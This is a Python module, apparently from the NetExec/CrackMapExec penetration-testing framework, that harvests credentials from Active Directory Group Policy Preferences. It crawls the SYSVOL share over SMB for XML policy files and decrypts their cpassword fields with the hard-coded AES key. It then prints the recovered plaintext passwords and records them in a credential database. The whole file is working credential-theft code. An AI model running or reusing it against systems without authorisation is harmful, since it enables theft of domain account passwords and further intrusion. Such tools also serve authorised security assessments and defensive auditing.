NetExec/cme/modules/gpp_password.py

87 lines
3.5 KiB
Python
Raw Normal View History

import xml.etree.ElementTree as ET
from Crypto.Cipher import AES
from base64 import b64decode
from binascii import unhexlify
from StringIO import StringIO
class CMEModule:
'''
Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
Module by @byt3bl33d3r
'''
name = 'gpp_password'
description = 'Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.'
supported_protocols = ['smb']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
'''
def on_login(self, context, connection):
shares = connection.shares()
for share in shares:
if share['name'] == 'SYSVOL' and 'READ' in share['access']:
paths = connection.spider('SYSVOL', pattern=['Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml'])
for path in paths:
buf = StringIO()
connection.conn.getFile('SYSVOL', path, buf.write)
xml = ET.fromstring(buf.getvalue())
if 'Groups.xml' in path:
xml_section = xml.findall("./User/Properties")
elif 'Services.xml' in path:
xml_section = xml.findall('./NTService/Properties')
elif 'Scheduledtasks.xml' in path:
xml_section = xml.findall('./Task/Properties')
elif 'DataSources.xml' in path:
xml_section = xml.findall('./DataSource/Properties')
elif 'Printers.xml' in path:
xml_section = xml.findall('./SharedPrinter/Properties')
elif 'Drives.xml' in path:
xml_section = xml.findall('./Drive/Properties')
for attr in xml_section:
props = attr.attrib
if props.has_key('cpassword'):
for user_tag in ['userName', 'accountName', 'runAs', 'username']:
if props.has_key(user_tag):
username = props[user_tag]
password = self.decrypt_cpassword(props['cpassword'])
context.log.success('Found credentials in {}'.format(path))
context.log.highlight('Password: {}'.format(password))
for k,v in props.iteritems():
if k != 'cpassword':
context.log.highlight('{}: {}'.format(k, v))
hostid = context.db.get_computers(connection.host)[0][0]
context.db.add_credential('plaintext', '', username, password, pillaged_from=hostid)
def decrypt_cpassword(self, cpassword):
#Stolen from https://github.com/leonteale/pentestpackage/blob/master/Gpprefdecrypt.py
# From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
key = unhexlify('4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b')
try:
password = b64decode(cpassword)
except TypeError:
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
password = b64decode(cpassword)
decypted = AES.new(key, AES.MODE_CBC, "\x00" * 16).decrypt(password)
return decypted[:-ord(decypted[-1])].decode('utf16')